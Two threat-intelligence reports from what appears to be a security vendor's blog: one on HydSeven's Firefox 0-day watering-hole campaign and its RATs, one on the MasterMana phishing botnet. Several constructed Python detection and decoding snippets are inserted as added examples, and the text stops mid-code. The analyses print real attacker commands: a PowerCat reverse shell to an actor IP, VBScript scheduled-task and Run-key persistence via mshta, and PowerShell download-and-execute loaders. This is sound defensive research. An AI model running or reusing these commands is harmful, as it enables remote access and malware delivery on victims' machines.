BLOG

Friday, November 15, 2019

Threat Summary: Operation BlockChain Gang; Advanced Exploits, Commodity Tools


This is Prevailion's first Threat Summary Report. For more information on this type of report and why we publish them, click here.

Authors: Danny Adamitis and David Maynor


Executive Summary



The research team at Prevailion has detected and analyzed Linux and Windows remote-access trojans associated with the advanced threat actor known as “HydSeven.” This threat group initially maintained a relatively low profile through the use of bespoke commodity malware. However, they caught the attention of the information security community when performing a highly targeted spear-phishing operation in the summer of 2019. 


In this campaign, which we have dubbed “Operation BlockChain Gang,” the threat actors used compromised Cambridge University infrastructure to phish and water-hole their targets. In analyzing the campaign, Prevailion has associated two new malware families with this group. In addition to the previously known Mac OS X agent, we’ve recently analyzed the Windows and Linux variants.


By illustrating how potential victims could have been infected by the group and detailing the capabilities of the malware, this report is intended to inform at-risk organizations and help them understand appropriate steps to avoid compromise.


Campaign Overview 



HydSeven appears to add a new twist to a common method of infection via email, known as “phishing.” While this particular technique is not new, victims rarely report actual interactions with threat actors. In this case, the threat actors crafted an innocuous email asking if the target would be willing to look over some applications for an award presumably in their area of expertise. In a statement about the attack, CoinBase reported, “We learned that over 200 individuals were targeted by this attacker.” 


It wasn't until after the victim responded, indicating that they would be willing to help, that they were sent the malicious link. That link would bring the victim to a threat actor-controlled “watering-hole” hostname on the Cambridge University domain. If someone visited this website from a Firefox browser, their host machine would be exploited by what was a 0-day exploit, later identified as CVE-2019-11707 and CVE-2019-11708. However, the actors did appear to make one small mistake at first; they did not add a message saying that the webpage could only be rendered in Firefox. Thus, some potential victims were saved from compromise simply because they used their default browser. If someone was unfortunate enough to have visited the website using Firefox, they would have been exploited, and an agent would have been deployed to their workstation. 


While other researchers have previously documented the functionality of the Mac OS X payload, Prevailion has, with moderate confidence, associated a Windows and a Linux component with this threat actor. We speculate that the threat actors likely did not go through the effort of obtaining certificates for the Mac OS X and Linux payloads, as those systems are less likely to have antivirus software running on them. These payloads were fully functional remote-access tools that allowed the threat actors to run commands, as well as send and receive data from their command-and-control servers (C2s).


This case study shows the lengths to which these advanced actors would go to establish access in a high-value network. Based on that same CoinBase report, it was calculated that only 2.5% of the people who received the initial email went on to receive the final link. This suggests that the threat actors expended all this effort to gain access to approximately five organizations, potentially in the financial sector.


This report highlights the emphasis that threat actors are placing on organizations that store and retain significant amounts of data about their customer base. We strongly encourage these organizations to assess their existing risk profiles, implement host-based defenses, and put incident response plans in place prior to an event. 


Initial Contact



According to a presentation given in October 2019 by a Line employee, potential victims of this campaign received a targeted email from a compromised Cambridge account asking them to “assess the quality of competing projects ... for the [Cambridge University] Adam’s Prize.” The Adam’s Prize is a highly respected contest, held every year by Cambridge and awarded to a person, or persons, who contributed original research to a given discipline, typically within the field of mathematics. 


The initial email appeared innocuous at first glance, asking recipients if they would be willing to help evaluate applications for the Adam’s award. These threat actors even went through the process of creating a LinkedIn account for the persona that sent the emails. While creating a fake profile has become typical of targeted attacks, corresponding with the victims was highly abnormal. In this particular case, correspondence went back and forth — with victims inquiring about requirements and terms of participation — but the link to the water-holed hostname was still not sent until the victim agreed to help. This unique tactic reveals that the threat actors are expanding the social-engineering aspect of their operations and displaying a level of audacity far beyond the norm.


The email contained a link with a unique username and password for the victim. The webpage seemed innocuous, with only one suspicious aspect: a message indicating that the page would only work when viewed in Firefox with a link to download the latest version. We speculate that the actors added this particular message after reading an article such as this one, by Robert Heaton. When Heaton visited the water-holed site, he did not get the Firefox prompt. In his words:

if “Gregory” had added just 7 extra words to this page - “THIS PAGE MUST BE VIEWED IN FIREFOX” - I would have been screwed. 


Crossover 
Around the same time, May 20, 2019, CoinBase experienced a similar attack. This was first reported by @SecurityGuyPhil in a series of tweets. Those tweets were later turned into a Medium post, which can be found here.


The CoinBase story was identical to what transpired at Line: victims received emails from a presumably compromised account associated with Cambridge. Only after the user interacted with the threat actor and expressed a willingness to help did they receive the malicious link. If the victim visited the water-holed website from a Firefox browser, it would call a malicious JavaScript file from the domain analyticsfit[.]com/init.js, which was hosted on the IP address 54[.]38[.]93[.]182.


The Firefox Exploit 
Once the victim clicked on the link or visited the website with the correct browser and operating system, it would trigger the malicious JavaScript hosted on analyticsfit[.]com. The first exploit, CVE-2019-11707, allowed the program to crash in a certain way, which was discovered and documented. The second exploit, CVE-2019-11708, would allow remote code execution on the compromised victim’s machine. Both CVEs were reported by Samuel Groß of Google Project Zero. On his Twitter account, Samuel stated the following about the vulnerability:


“So all in all this looks like a bug collision (not a 1day constructed from the bugfix, not a leak from any of the bug trackers). My guess is that someone was looking for that bug pattern or even specifically for a variant of CVE-2019-[9810] and found the bug that way”


Based upon Prevailion’s analysis, the exploit would not allow for remote code execution on Chrome due to Chrome’s use of a different JavaScript engine. 


Mac OS X Agent



Once the exploit was run, the code would obtain the first-stage agent from the C2 server, located at hxxp://185[.]162[.]131[.]96/i/IconServicesAgent. This agent was analyzed extensively in a series of blog posts by Digita Security, in which it was identified as a variant of “NetWire.” A commercially available “systems administration tool”, NetWire can be purchased online at a rate of $120 per year. Despite its low cost, cracked versions of this software are also available to download for free on the internet. 


Of note, while NetWire is commercially available, the sample had a low detection rate when originally submitted to VirusTotal on June 2, 2019. At that time, it was flagged as malicious by only one vendor. Since then, though, several companies have created signatures for this tool. In the course of our investigation, we identified two new samples associated with this group. Interestingly, one was named “fuck_tencent” — potentially a reference to the Chinese conglomerate Tencent Holdings Ltd.


Once installed on the victim machine, the application masqueraded as the “Finder” application. It then attempted to gather host-based credentials and establish persistence. After gathering host-based information and presumably determining that the environment was of interest, it would install the second, more robust payload, later identified as “Ekoms”. Digita Security performed an extensive write-up on this sample as well, which can be found here.


Like most second-stage remote-access trojans, it allowed the threat actor to deploy keyloggers, grab screenshots, transfer files, and send audio captures. As with the previous tool, when this sample was submitted to VirusTotal, it was not flagged as malicious by any AV vendor. The initial detection rate for the Ekoms sample was 0/53 when it was uploaded on June 20, 2019.


Analysis of Linux Agent



During our investigation, the Prevailion team found three ELF files designed for Linux-based operating systems. Like most of the Mac samples, when the file was initially uploaded to VirusTotal, it had a detection rate of zero. And, even as of November 10, it is only being detected by three vendors.

Initial detection rate of 0/53 for the Linux agent uploaded on March 29th, 2019

The first agent we analyzed was a fully functional remote-access trojan designed for Red Hat Linux. We hypothesize that the infection mechanism was similar to the one used to deploy the Mac OS X agent. Once the agent was sent to the machine, it would install itself as a desktop application.

Screenshot of the RC4 embedded within the sample

As in the aforementioned Mac samples, it contained the same RC4 encryption key, used to decrypt a section of code containing the C2 IP address, Host-ID, and Default Group that would be set by the threat actor.

Decrypted output of the encrypted code
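The shared-key configuration recovery described above, as an added example rather than code from the report or the samples: a compact RC4 implementation that decrypts an embedded configuration block and parses out the C2 address, Host-ID and Default Group. The key, the '|'-separated field layout and the sample values are constructed assumptions; the real key is not reproduced here.

```python
"""RC4 configuration extractor (added example for this report).

The samples described above embed an RC4 key and an RC4-encrypted block
holding the C2 IP address, Host-ID and Default Group. This example builds a
constructed blob with a constructed key, then decrypts and parses it the way
an analyst's config extractor would. Key, blob layout and field separator are
assumptions, not values taken from the samples.
"""
from typing import Dict, List

# Constructed values for the demo (NOT the key or C2 from the samples).
CONSTRUCTED_KEY = b"example-rc4-key"
CONSTRUCTED_CONFIG = b"198.51.100.23:443|HOST-ID-demo|DefaultGroup"


def rc4_ksa(key: bytes) -> List[int]:
    """RC4 key-scheduling algorithm: produce the 256-byte permutation S."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s


def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """RC4 keystream XOR; the cipher is symmetric, so this also decrypts."""
    s = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def parse_config(plaintext: bytes) -> Dict[str, str]:
    """Split the decrypted block into the fields named in the report.

    The '|'-separated layout is an assumption made for this example.
    """
    fields = plaintext.rstrip(b"\x00").split(b"|")
    if len(fields) != 3:
        raise ValueError("unexpected field count: %d" % len(fields))
    c2, host_id, group = (f.decode("ascii", "replace") for f in fields)
    host, _, port = c2.rpartition(":")
    return {"c2_host": host, "c2_port": port,
            "host_id": host_id, "default_group": group}


def extract_config(key: bytes, encrypted_blob: bytes) -> Dict[str, str]:
    """Decrypt an embedded config blob with the shared key and parse it."""
    return parse_config(rc4_crypt(key, encrypted_blob))


def constructed_blob() -> bytes:
    """Build the encrypted blob a sample would carry (constructed here)."""
    return rc4_crypt(CONSTRUCTED_KEY, CONSTRUCTED_CONFIG)


def rc4_known_answer() -> str:
    """Standard RC4 test vector (key 'Key', plaintext 'Plaintext') as a self-check."""
    return rc4_crypt(b"Key", b"Plaintext").hex()


if __name__ == "__main__":
    blob = constructed_blob()
    print("encrypted:", blob.hex())
    print("config   :", extract_config(CONSTRUCTED_KEY, blob))
```

Because the key was shared across the Windows, Linux and Mac samples, the same extractor applies to any of them once the encrypted block is located.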

When we analyzed this agent, it would gather the machine’s current IP address by making a request to checkip[.]dyndns[.]org. The agent had the ability to gather information about the victim machine and execute various commands. Examples include:

  • Retrieving information about the user (getuid, getpwuid)
  • Retrieving information about the host (gethostname, sysinfo, sysconf, cpuinfo)
  • Retrieving environment variables (getenv)
  • Retrieving information about the process and its parent process
  • Running commands (via /bin/bash or /bin/sh)
  • Reading, writing, and deleting files
  • Making and removing directories
  • Killing a process


The agent would persist by auto-starting on login. The functionality suggested its primary purpose was to act as a proxy, or relay, to send commands and data from the threat actors outside the network to other agents within the network. One particular aspect of the agent was the use of a hard-coded user-agent string: 


“Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko”


This was of particular note because the agent was designed for Linux, yet this is the typical user-agent string for a Windows 8.1 or Server 2012 operating system.
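A proxy-log check for the mismatch just described, added here as an example and not taken from the report: it runs over constructed proxy log lines and an assumed asset inventory, flagging Linux hosts that present the Windows user-agent string and requests to the external-IP lookup service the agent used.

```python
"""Proxy-log check for the Linux agent behaviour described above (added example).

Flags hosts whose asset inventory says Linux but whose HTTP requests carry a
Windows-style user-agent, and requests to checkip.dyndns.org. Log format,
asset inventory and IP addresses are constructed for the demo.
"""
import re
from typing import Dict, List, Tuple

# User-agent string the report quotes as hard-coded in the Linux agent.
SUSPECT_UA = "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko"

# Constructed asset inventory for the demo: source IP -> operating system.
ASSET_OS: Dict[str, str] = {
    "10.0.0.11": "linux",
    "10.0.0.12": "windows",
    "10.0.0.13": "linux",
}

# Constructed proxy log lines: time, src, method, url, status, "user-agent".
SAMPLE_LOG = "\n".join([
    '2019-06-20T10:01:02Z 10.0.0.11 GET http://checkip.dyndns.org/ 200 "%s"' % SUSPECT_UA,
    '2019-06-20T10:01:05Z 10.0.0.12 GET http://www.example.com/ 200 "%s"' % SUSPECT_UA,
    '2019-06-20T10:01:09Z 10.0.0.13 GET http://mirror.example.org/updates 200 "curl/7.61.1"',
    '2019-06-20T10:02:00Z 10.0.0.11 POST http://203.0.113.5/ 200 "%s"' % SUSPECT_UA,
])

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) "([^"]*)"$')
WINDOWS_UA_RE = re.compile(r"Windows NT \d+\.\d+")
IP_LOOKUP_HOSTS = {"checkip.dyndns.org"}  # external-IP lookup the agent used


def ua_claims_windows(user_agent: str) -> bool:
    """True if the user-agent advertises a Windows platform token."""
    return WINDOWS_UA_RE.search(user_agent) is not None


def host_of(url: str) -> str:
    """Extract the lower-cased host from an absolute http(s) URL."""
    return re.sub(r"^https?://", "", url).split("/", 1)[0].lower()


def analyse_proxy_log(log_text: str, asset_os: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """Return (src_ip, reason, detail) findings for suspicious log lines."""
    findings: List[Tuple[str, str, str]] = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not match the expected format
        _, src, _, url, _, ua = m.groups()
        os_name = asset_os.get(src, "unknown")
        # A Linux host presenting a Windows user-agent is the mismatch the
        # report calls out; a curl user-agent from Linux is unremarkable.
        if os_name == "linux" and ua_claims_windows(ua):
            findings.append((src, "os-ua-mismatch", ua))
        # A workstation discovering its own external IP is worth a look too.
        if host_of(url) in IP_LOOKUP_HOSTS:
            findings.append((src, "external-ip-lookup", host_of(url)))
    return findings


if __name__ == "__main__":
    for src, reason, detail in analyse_proxy_log(SAMPLE_LOG, ASSET_OS):
        print(src, reason, detail)
```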


Analysis of the Windows Agent 



While the previous case studies provided insight into how the threat actor operated in the Mac OS X environment, pivoting on those same C2s, we identified another campaign from earlier this year. The two IP addresses referenced in the CoinBase targeting were:

  • 185[.]162[.]131[.]96
  • 89[.]34[.]111[.]113


Vitali Kremez, @VK_Intel, later noted that he found a signed Windows binary, with the certificate being issued to “SANJ CONSULTING LTD”. Once the binary was analyzed, it communicated with the same C2 as the Mac OS X malware from the CoinBase attack. 


“cmd.exe /c powershell; Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process -Force;. "%s"; powercat -l -p 4000 -r tcp:89.34.111.113:443;
goto :loop”


This binary was a compiled version of PowerCat, an open-source project written in PowerShell. We have associated additional PowerCat samples with the same threat group; however, they were not signed by a certificate authority. To avoid detection based on common strings, they used an obfuscator such as “Invoke-Obfuscation”. PowerCat is a fully functional remote-access trojan that:

  • Uploaded and downloaded files
  • Executed PowerShell commands
  • Included DNSCat2 functionality as an alternative communications channel
  • Acted as a relay to other agents inside the network perimeter


Another notable feature of these agents was their ability to act as a relay. This is significant because once the threat actors have access to a relay on the network behind the firewall, there are typically few, if any, appliances in place to detect the lateral movement of the actor. These relay agents allow the threat actors to access more sensitive data hosted on servers that are only accessible once a client has been authenticated and permitted into the local network. 


Overlap with Previous Campaigns
One other significant element was the use of a common RC4 key across the Windows, Linux, and Mac-based samples. The use of this shared RC4 key and overlapping C2s led us to believe, with moderate confidence, that all of these samples can be associated with the same threat actor. This threat actor group has previously been reported as being active in both Japan and Poland.


Mitigations



This threat actor has showcased a number of techniques that would categorize them as an extremely advanced adversary. This campaign highlights the focus on large organizations that store and retain significant amounts of data about their customer base. 


Large crypto exchanges, corporations, and other organizations storing sensitive customer information should continuously assess their risk profiles and employ host-based defenses on their systems. For example, while the Mac OS X agent was initially undetected by AV, the use of a personal firewall — such as LuLu for Mac or iptables for Linux — would have alerted the user to an outbound connection. And, when browsing the internet, users can mitigate risk by making use of NoScript, a browser plugin that blocks all JavaScript, Java, and Flash unless explicitly allowed by the user.


While there is currently no single solution to protect every system with 100% fidelity, these products can significantly reduce risk by displaying a pop-up to alert the end user about activity in the background of their system. This gives them a greater opportunity to at least detect abnormalities and potentially avoid a breach. 


Organizations should also work on preparing and rehearsing their incident response plans. Thus, if an event does occur, they will have an established procedure regarding who to contact and what to do. Furthermore, in an incident response investigation, it is critical to check the entire network, not just the machines where an alert was detected. This includes Linux-based workstations and servers, as these systems sometimes get overlooked. If you feel that your Linux-based system may have been compromised, guidelines on how to inspect that system can be found here.    


While it’s important to have a security team on staff, the end user is always your first line of defense to detect suspicious activity. For example, if someone receives an email asking them to evaluate an international award in economics, and they are not an economist, they should consult their network security staff. If you have host-based firewalls in place and a user suddenly starts seeing a pop-up message about a cURL command connecting to a server in Hong Kong, there may be an issue at hand. Training your employees to take these alerts seriously could prevent a major incident from occurring.    


Indicators of Compromise 
The following is a list of indicators associated with this threat group. The list is compiled from information gathered by Prevailion employees and the open-source community.


Exploit Server
analyticsfit[.]com/init.js
54[.]38[.]93[.]182



Wednesday, October 2, 2019

MasterMana BotNet

The MasterMana Botnet: Anatomy of the $160 Dollar Hack
Authors: Danny Adamitis and Matt Thompson


Introduction


The team at Prevailion has uncovered new details concerning “MasterMana Botnet,” an ongoing cyber-crime campaign that hits all of the cyber bingo buzzwords: business email compromise, backdoors, and cryptocurrency wallets. There are indications this operation — which targeted corporations around the world for less than the cost of a night at the baseball park — was still active as late as 24 September 2019.

This operation, which began as early as December of 2018, appears financially motivated, given the seemingly indiscriminate targeting of business email addresses via phishing and the inclusion of specific functions to steal information associated with cryptocurrency wallets. Based upon exhibited tactics, techniques, and procedures (TTPs), we have associated it — with moderate confidence — to the “Gorgon Group”, a well known group active for numerous years that has been known to straddle the line between cybercrime and intelligence operations.

Once the victims opened the phishing email, they found an infected document attachment. Opening the infected document initiated the attack’s multi-pronged, labyrinth-like kill-chain. The layered kill-chain approach aids in evading detection by relying upon the trust placed in a number of third-party websites and services, such as Bitly, Blogspot, and Pastebin, as opposed to exclusively using actor-controlled domains.

The threat actors also took the additional steps of modifying older Pastebin posts to cease execution, as well as adding features to avoid some automated detection, such as sandboxing.

Ultimately the victim would download a .NET DLL that would perform process hollowing and load a fileless backdoor — either a variant of Azorult or Revenge Rat. The team at Prevailion determined that the threat actors used Revenge Rat, a well-known remote access trojan (RAT) tool that could be found online for free, through the week of September 15th, at which time they switched to Azorult, a well-known trojan previously for sale on certain forums for $100US.

The Azorult trojan was designed to steal usernames, passwords, cookies, web history, and cryptocurrency wallets. It also contained functionality to enumerate the host, upload files, download files, and take screenshots of the victim’s machine. This functionality could allow an actor to deploy additional payloads, such as cryptominers and ransomware.

In addition to aiding in detection avoidance, using third-party services also enabled the threat actors to conduct the campaign at minimal cost. Leasing Virtual Private Servers (VPS) costs an estimated $60US, and Azorult versions were available for under $100US via Russian-based cyber-crime forums earlier this year.

This particular campaign highlights the asymmetric nature of these threats. As companies increasingly spend more money on security solutions, threat actors are able to operate on shoestring budgets. In this case, the threat actors struck a perfect balance: sophisticated enough to avoid automated detection through third-party services and obfuscation while remaining below APT-level sophistication to avoid drawing attention to their campaign.

These new details about the wide-scale targeting of this ongoing campaign — dubbed “MasterMana Botnet” — highlight the potential impact of moderately sophisticated campaigns to all corporations and organizations. While most companies fear they may become compromised by advanced actors, this particular report highlights that actors do not have to rely on advanced tools or techniques to have a serious business impact.

We recommend a defense-in-depth strategy with multiple security solutions including properly configured firewalls, email protection, and end-point antivirus solutions.

While the infection mechanism relied upon semi-trusted third party sites, the use of commonly available backdoors made this attack easy to stop for updated and properly-configured endpoint solutions.


Campaign Walk Through 



Step 1 - Phishing E-Mails

One observed infection vector used by these threat actors was trojanized Excel documents sent to victims via email. The emails appeared to impersonate business dealings by sending the recipients invoices and product requirements.

In one case, an email impersonated a small-sized legitimate company based out of Dubai, UAE. Both of the emails that we discovered were sent from free email providers, such as Yahoo and Yandex.

 



Phishing email sent from free webmail provider to potential victim




Phishing email sent from a potentially compromised account 




Step 2 - Infected Document Attachments

Once the victim received the email, presumably they would then download the infected file attachment. In one case, the Excel document attachment would prompt the victim to then enable a macro. Once macros were enabled, the VBS script would reach out to a Bitly link.

In another instance, a different Microsoft Excel file was attached, which used the Dynamic Data Exchange (DDE) exploit, CVE-2017-11826. Similar to the previous sample, when the document was opened, the OLE object automatically reached out to an embedded Bitly link.

Additionally, we saw references in the code that indicated the threat actors could have trojanized the following Microsoft file formats:
  • Word
  • Excel
  • PowerPoint
  • Publisher


Step 3 - Bitly Link Redirection to “TeamMana” Blogspot

The victim machine would then attempt to resolve the embedded Bitly link. Once the link was expanded, it would direct the victim to an actor-controlled hostname associated with Blogspot.

The team at Prevailion observed the same hostname in use across multiple campaigns; however, the expanded Bitly links correlated to different URLs. One of the more popular campaigns occurred in late August and continued through September. This particular link appeared to have been clicked approximately 2200 times by end users located around the globe.
 
Bitly metrics showing the number of times the link has been clicked associated with the September 9th Campaign




Bitly metrics showing the number of times the link has been clicked associated with the September 15th Campaign

Once expanded, the Bitly links would bring the victim to a URL associated with the hostname myownteammana[.]blogspot[.]com. If the website was visited in a web browser, the site appeared benign. Upon further inspection, however, we discovered the presence of malicious JavaScript within the webpage.

Screenshot of the actor-controlled blogspot webpage 

Once the embedded JavaScript was decoded, it revealed a VBScript that ran mshta.exe on code found at a Pastebin URL.


Step 4 - Creating Scheduled Tasks and Registry Keys

The Pastebin URL would reveal another JavaScript snippet. Similar to the previous step, the Pastebin file was a URL-encoded VBScript that was obfuscated using some simple tricks, such as string reversals and unnecessary concatenations, to avoid detection. Once deobfuscated, the script would kill any running instances of MS Word, Excel, PowerPoint, and Publisher.

Next, it would attempt to create scheduled tasks and modify a registry key to obtain the next payload. One interesting aspect was the inclusion of a time delay on the scheduled task, which likely aided in avoiding detection by a certain sandbox environment that may have had a timer of five minutes.

At the end of September, the threat actor began modifying their TTPs to use three scheduled tasks and one registry key, instead of two. These scheduled tasks would kick off after six minutes then five hours and then ten hours. Then, the registry key instance would persist after a reboot.


<script language="VBScript">

CreateObject("WScript.Shell").Run "cmd.exe /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & exit", vbHide

CreateObject("WScript.Shell").Run schtasks /create /sc MINUTE /mo 06 /tn ""Windows Update"" /tr ""mshta.exe http://pastebin.com/raw/{Specific URL}"" /F , vbHide

CreateObject("WScript.Shell").Run schtasks /create /sc MINUTE /mo 300 /tn ""Update"" /tr ""mshta.exe http://pastebin.com/raw/{Specific URL}"" /F , vbHide

CreateObject("WScript.Shell").Run schtasks /create /sc MINUTE /mo 600 /tn ""Genuine"" /tr ""mshta.exe http://pastebin.com/raw/{Specific URL}"" /F , vbHide

CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AvastUpdate","mshta.exe http://pastebin.com/raw/{Specific URL}","REG_EXPAND_SZ"

Self.close </script>
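Detection logic for this persistence pattern, added as an example and not part of the original report: it inspects constructed process-creation and registry-write events (the shape a Sysmon-style sensor emits) for scheduled tasks and Run keys whose command launches mshta.exe against a remote URL. The event shape, task names and paste IDs are constructed placeholders.

```python
"""Detector for mshta-based scheduled-task and Run-key persistence (added example).

Mirrors the VBScript above: schtasks /create with an /tr action of
"mshta.exe http://...", and a Run-key value with the same command.
Events, task names and paste IDs are constructed for the demo.
"""
import re
from typing import Dict, Iterable, List

URL_RE = re.compile(r"https?://\S+", re.I)
MSHTA_RE = re.compile(r"\bmshta(?:\.exe)?\b", re.I)
SCHTASKS_CREATE_RE = re.compile(r"\bschtasks(?:\.exe)?\b.*?/create\b", re.I)
RUN_KEY_RE = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\", re.I)


def _arg(cmdline: str, switch: str) -> str:
    """Return the value following a schtasks switch, quoted or bare ('' if absent)."""
    m = re.search(r'%s\s+(?:"([^"]*)"|(\S+))' % re.escape(switch), cmdline, re.I)
    if not m:
        return ""
    return m.group(1) if m.group(1) is not None else m.group(2)


def mshta_remote(command: str) -> bool:
    """True when a command launches mshta against an http(s) URL."""
    return bool(MSHTA_RE.search(command) and URL_RE.search(command))


def inspect_event(event: Dict[str, str]) -> List[str]:
    """Return findings for one event; an empty list means nothing flagged."""
    findings: List[str] = []
    if event["type"] == "process":
        cmd = event["cmdline"]
        if SCHTASKS_CREATE_RE.search(cmd):
            # Judge the task by its /tr action, not its benign-looking name.
            action = _arg(cmd, "/tr")
            if mshta_remote(action):
                findings.append(
                    "scheduled task %r runs mshta from %s (every %s %s)"
                    % (_arg(cmd, "/tn"), URL_RE.search(action).group(0),
                       _arg(cmd, "/mo") or "?", _arg(cmd, "/sc") or "?"))
        elif mshta_remote(cmd):
            findings.append("mshta launched with remote URL %s"
                            % URL_RE.search(cmd).group(0))
    elif event["type"] == "registry":
        # A Run-key value of mshta + URL mirrors the RegWrite call above.
        if RUN_KEY_RE.search(event["key"]) and mshta_remote(event["value"]):
            findings.append("Run key %s points mshta at %s"
                            % (event["key"].rsplit("\\", 1)[-1],
                               URL_RE.search(event["value"]).group(0)))
    return findings


def inspect_events(events: Iterable[Dict[str, str]]) -> List[str]:
    """Run inspect_event over a stream of events and collect all findings."""
    out: List[str] = []
    for ev in events:
        out.extend(inspect_event(ev))
    return out


# Constructed events modelled on the VBScript above; the paste ID is a placeholder.
PASTE = "http://pastebin.com/raw/PLACEHOLDER-ID"
SAMPLE_EVENTS = [
    {"type": "process",
     "cmdline": 'schtasks /create /sc MINUTE /mo 06 /tn "Windows Update" /tr "mshta.exe %s" /F' % PASTE},
    {"type": "process",
     "cmdline": 'schtasks /create /sc DAILY /tn "Nightly Backup" /tr "C:\\Tools\\backup.exe" /F'},
    {"type": "process", "cmdline": "mshta.exe %s" % PASTE},
    {"type": "registry",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AvastUpdate",
     "value": "mshta.exe %s" % PASTE},
    {"type": "registry",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "value": r'"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
]

if __name__ == "__main__":
    for finding in inspect_events(SAMPLE_EVENTS):
        print(finding)
```

The interval reported for each task lets an analyst spot the six-minute and multi-hour delays the report describes as a sandbox-evasion tactic.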


Step 5 - Downloading and Loading the Trojan

Once the scheduled tasks and registry keys were created, they were then populated with the contents of another Pastebin URL. Interestingly, our team noticed that some of the older Pastebin posts were modified to cease execution of the kill-chain.

We assess that these older Pastebin posts were almost certainly modified by the threat actor, potentially after a set period of time. This suggests that the threat actors are taking steps to remove older links, thereby protecting their tools and operations. One of the active links provided a URL-encoded string that decoded to the text below.

Screenshot of the URL decoded VBScript 

That PowerShell command was obfuscated both by reversing the order of the string and by expressing it as comma-delimited, base-10 CharCodes.

One of the tools that we used in decoding these various commands was CyberChef.

Screenshot of CyberChef, using the “Reverse” and “From Charcode” modules to deobfuscate the script

The plaintext PowerShell script used in the September 15th campaign can be viewed below.

[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');

$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'hxxps://pastebin[.]com/raw/{Specific URL}')|IEX;

[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'hxxps://pastebin[.]com/raw/{Specific URL}').replace('!#@','0x')|IEX;

[k.Hackitup]::exe(notepad.exe',$f)

Prior to the 15th, the threat actors used a slightly modified script. This older variant had certain functionality to confirm that the machine had access to the internet before running. The variant also used MSBuild.exe. We suspect the adversary chose MSBuild because it is a signed Microsoft binary, and using this process to execute arbitrary code could allow them to bypass some application whitelisting controls on the host.

do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');

$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://pastebin.com/raw/{Specific URL}')|IEX;

[Byte[]]$f=[Microsoft.VisualBasic.Intraction]::CallByname((New-ObjectNet.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://pastebin.com/raw/{Specific URL}').replace('#!','0x')|IEX;

[email protected]('MSBuild.exe',$f);

$g22=$a.GetType('THC452563sdfdsdfgr4777cxg04477fsdf810df777');

$y=$g22.GetMethod('retrt477fdg145fd4g0wewerwedsa799221dsad4154qwe');

$j=[Activator]::CreateInstance($g22,$null);

$y.Invoke($j,$obj)

The first Pastebin sample downloaded from the script was heavily obfuscated. Once it was URL-decoded, it revealed a PowerShell script that was obfuscated using base-10 CharCodes. The deobfuscated text revealed another large string of hex characters. However, to further evade detection and obfuscate the code, the “0x” that typically precedes the hex was replaced with “%_”. The PowerShell would replace “%_” with “0x” right before execution. Once the replacement was complete, we were able to extract a Dynamic-Link Library (.dll) written in .NET.

The second Pastebin sample we downloaded from the script was only semi-obfuscated. Similar to the previous samples, the threat actors prepended “!#@” to the hex characters, likely to evade detection. However, prior to execution, the string “!#@” would be replaced with “0x” to produce a fully functional RAT.
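The decoding chain described in step 5 (URL-decode, reverse, base-10 CharCodes, and the “!#@”/“%_” substitution for “0x”), as an added example that is not the report’s own tooling: the inputs are constructed by applying the same layers to a harmless stand-in, and the comma-separated hex-literal layout assumed for the payload pastes is an assumption, not a detail taken from the samples.

```python
"""Decoder for the MasterMana obfuscation layers described above (added example).

Reproduces the steps the analysis lists: URL-decode, reverse the string, turn
comma-delimited base-10 CharCodes back into text, and undo the "0x" -> "!#@"
or "%_" prefix swap before parsing hex bytes. Sample inputs are constructed
here by applying those same layers to a harmless stand-in.
"""
import re
from urllib.parse import quote, unquote

PREFIX_MARKERS = ("!#@", "%_")  # substitutes for "0x" named in the report


def obfuscate_charcode(script: str) -> str:
    """Construct a paste body shaped like the loader's (demo only)."""
    codes = ",".join(str(ord(ch)) for ch in script)
    return quote(codes[::-1], safe="")


def decode_charcode_paste(paste: str) -> str:
    """URL-decode, reverse, then turn comma-delimited CharCodes into text."""
    reversed_codes = unquote(paste)[::-1]
    return "".join(chr(int(tok)) for tok in reversed_codes.split(",") if tok)


def obfuscate_payload(payload: bytes, marker: str) -> str:
    """Construct a hex-literal paste with the 0x prefix replaced (demo only).

    The comma-separated "0x.." literal layout is an assumption of this example.
    """
    return ",".join("0x%02X" % b for b in payload).replace("0x", marker)


def decode_payload_paste(paste: str) -> bytes:
    """Undo the prefix swap and parse the hex literals back into bytes."""
    text = paste
    for marker in PREFIX_MARKERS:
        text = text.replace(marker, "0x")
    return bytes(int(tok, 16) for tok in re.findall(r"0x([0-9A-Fa-f]{2})", text))


def looks_like_pe(data: bytes) -> bool:
    """A recovered .NET DLL or RAT is a PE file and starts with 'MZ'."""
    return data[:2] == b"MZ"


# Constructed stand-ins: a benign one-liner and a fake PE header.
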